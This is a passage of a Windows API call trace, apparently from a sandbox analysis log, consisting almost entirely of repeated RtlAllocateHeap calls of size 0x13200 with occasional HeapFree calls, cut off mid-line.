[0080.347] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2553170 [0080.348] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x468) returned 0x5dc590 [0080.348] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8ab0 | out: hHeap=0x5b0000) returned 1 [0080.348] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2566380 [0080.348] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2579590 [0080.348] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x258c7a0 [0080.349] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x259f9b0 [0080.349] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x25b2bc0 [0080.349] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x25d0080 [0080.350] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x25e3290 [0080.351] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x25f64a0 [0080.351] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x26096b0 [0080.351] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x261c8c0 [0080.352] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x262fad0 [0080.352] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2642ce0 [0080.353] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2655ef0 [0080.353] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2669100 [0080.353] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x267c310 [0080.354] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x268f520 [0080.354] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x26a2730 [0080.354] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x26b5940 [0080.355] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x26c8b50 [0080.355] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x26dbd60 [0080.355] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x26eef70 [0080.356] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2702180 [0080.356] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2715390 [0080.357] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x27285a0 [0080.357] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x273b7b0 [0080.357] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x274e9c0 [0080.358] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2761bd0 [0080.358] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2774de0 [0080.358] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2787ff0 [0080.359] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x279b200 [0080.359] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x27ae410 [0080.359] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x27c1620 [0080.361] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x27d4830 [0080.361] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x27e7a40 [0080.362] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x27fac50 [0080.362] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x280de60 [0080.362] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2821070 [0080.435] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2834280 [0080.435] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2847490 [0080.436] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x285a6a0 [0080.436] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x286d8b0 [0080.436] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2880ac0 [0080.437] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2893cd0 [0080.437] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x28a6ee0 [0080.438] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x28ba0f0 [0080.438] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x28cd300 [0080.438] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x28e0510 [0080.439] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x698) returned 0x5c88b0 [0080.439] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5dc590 | out: hHeap=0x5b0000) returned 1 [0080.439] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x28f3720 [0080.439] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2906930 [0080.439] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2919b40 [0080.439] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x292cd50 [0080.440] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x293ff60 [0080.440] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2953170 [0080.441] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2966380 [0080.442] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2979590 [0080.442] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x298c7a0 [0080.442] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x299f9b0 [0080.443] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x29b2bc0 [0080.443] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x29c5dd0 [0080.443] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x29d8fe0 [0080.444] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x29ec1f0 [0080.444] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x29ff400 [0080.445] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2a12610 [0080.445] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2a25820 [0080.445] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2a38a30 [0080.446] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2a4bc40 [0080.446] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2a5ee50 [0080.446] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2a72060 [0080.447] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2a85270 [0080.447] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2a98480 [0080.448] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2aab690 [0080.448] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2abe8a0 [0080.448] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2ad1ab0 [0080.448] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2ae4cc0 [0080.449] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2af7ed0 [0080.449] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2b0b0e0 [0080.450] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2b1e2f0 [0080.450] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2b31500 [0080.450] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2b44710 [0080.451] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2b57920 [0080.451] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2b6ab30 [0080.479] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2b7dd40 [0080.480] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2b90f50 [0080.480] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2ba4160 [0080.481] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2bb7370 [0080.481] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2bca580 [0080.481] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2bdd790 [0080.482] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2bf09a0 [0080.482] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2c03bb0 [0080.483] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2c16dc0 [0080.483] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2c29fd0 [0080.483] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2c3d1e0 [0080.484] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2c503f0 [0080.484] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2c63600 [0080.485] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2c76810 [0080.485] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2c89a20 [0080.485] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2c9cc30 [0080.486] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2cafe40 [0080.486] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2cc3050 [0080.486] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2cd6260 [0080.487] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2ce9470 [0080.487] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2cfc680 [0080.488] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2d0f890 [0080.488] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2d22aa0 [0080.489] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2d35cb0 [0080.489] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2d48ec0 [0080.489] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2d5c0d0 [0080.490] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2d6f2e0 [0080.490] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2d824f0 [0080.490] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2d95700 [0080.491] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2da8910 [0080.491] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2dd0080 [0080.492] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2de3290 [0080.493] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2df64a0 [0080.493] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2e096b0 [0080.494] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2e1c8c0 [0080.494] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2e2fad0 [0080.494] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x9e0) returned 0x5dc590 [0080.494] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c88b0 | out: hHeap=0x5b0000) returned 1 [0080.494] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2e42ce0 [0080.495] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2e55ef0 [0080.495] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2e69100 [0080.496] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2e7c310 [0080.496] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2e8f520 [0080.496] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2ea2730 [0080.497] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2eb5940 [0080.497] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2ec8b50 [0081.252] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2edbd60 [0081.253] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2eeef70 [0081.253] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2f02180 [0081.254] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2f15390 [0081.254] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2f285a0 [0081.254] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2f3b7b0 [0081.255] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2f4e9c0 [0081.255] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2f61bd0 [0081.255] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2f74de0 [0081.256] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2f87ff0 [0081.256] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2f9b200 [0081.256] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2fae410 [0081.257] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2fc1620 [0081.257] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2fd4830 [0081.257] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2fe7a40 [0081.258] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2ffac50 [0081.258] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x300de60 [0081.259] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3021070 [0081.259] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3034280 [0081.260] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3047490 [0081.260] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x305a6a0 [0081.261] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x306d8b0 [0081.261] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3080ac0 [0081.261] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3093cd0 [0081.262] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x30a6ee0 [0081.262] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x30ba0f0 [0081.262] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x30cd300 [0081.263] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x30e0510 [0081.263] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x30f3720 [0081.264] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3106930 [0081.264] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3119b40 [0081.264] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x312cd50 [0081.264] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x313ff60 [0081.265] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3153170 [0081.265] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3166380 [0081.266] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3179590 [0081.266] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x318c7a0 [0081.266] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x319f9b0 [0081.267] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x31b2bc0 [0081.267] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x31c5dd0 [0081.267] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x31d8fe0 [0081.268] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x31ec1f0 [0081.268] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x31ff400 [0081.269] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3212610 [0081.269] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3225820 [0081.270] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3238a30 [0081.270] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x324bc40 [0081.270] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x325ee50 [0081.271] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3272060 [0081.271] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3285270 [0081.271] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3298480 [0081.272] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x32ab690 [0081.272] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x32be8a0 [0081.272] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x32d1ab0 [0081.272] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x32e4cc0 [0081.273] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x32f7ed0 [0081.273] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x330b0e0 [0081.274] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x331e2f0 [0081.275] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3331500 [0081.275] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3344710 [0081.275] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3357920 [0081.276] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x336ab30 [0081.276] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x337dd40 [0081.276] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3390f50 [0081.277] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x33a4160 [0081.277] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x33b7370 [0081.277] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x33ca580 [0081.278] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x33dd790 [0081.278] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x33f09a0 [0081.279] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3403bb0 [0081.279] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3416dc0 [0081.279] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3429fd0 [0081.280] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x343d1e0 [0081.281] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x34503f0 [0081.282] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3463600 [0081.283] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3476810 [0081.284] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3489a20 [0081.284] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x349cc30 [0081.285] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x34afe40 [0081.285] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x34c3050 [0081.286] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x34d6260 [0081.287] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x34e9470 [0081.287] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x34fc680 [0081.288] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x350f890 [0081.288] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3522aa0 [0081.289] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3535cb0 [0081.289] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3548ec0 [0081.290] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x355c0d0 [0081.290] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x356f2e0 [0081.290] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x35824f0 [0081.291] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3595700 [0081.291] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x35a8910 [0081.370] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x35bbb20 [0081.370] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x35ced30 [0081.371] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x35e1f40 [0081.371] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x35f5150 [0081.372] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3608360 [0081.372] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xed0) returned 0x5fa630 [0081.372] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5dc590 | out: hHeap=0x5b0000) returned 1 [0081.372] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x361b570 [0081.373] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x362e780 [0081.373] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3641990 [0081.373] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3654ba0 [0081.373] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3667db0 [0081.374] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x367afc0 [0081.374] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x368e1d0 [0081.374] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x36a13e0 [0081.375] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x36b45f0 [0081.375] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x36c7800 [0081.375] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x36daa10 [0081.376] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x36edc20 [0081.376] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3700e30 [0081.376] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3714040 [0081.377] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3727250 [0081.377] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x373a460 [0081.377] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x374d670 [0081.378] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3760880 [0081.378] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3773a90 [0081.378] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3786ca0 [0081.379] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3799eb0 [0081.379] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x37ad0c0 [0081.379] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x37c02d0 [0081.380] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x37d34e0 [0081.380] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x37e66f0 [0081.380] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x37f9900 [0081.380] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x380cb10 [0081.381] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x381fd20 [0081.381] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 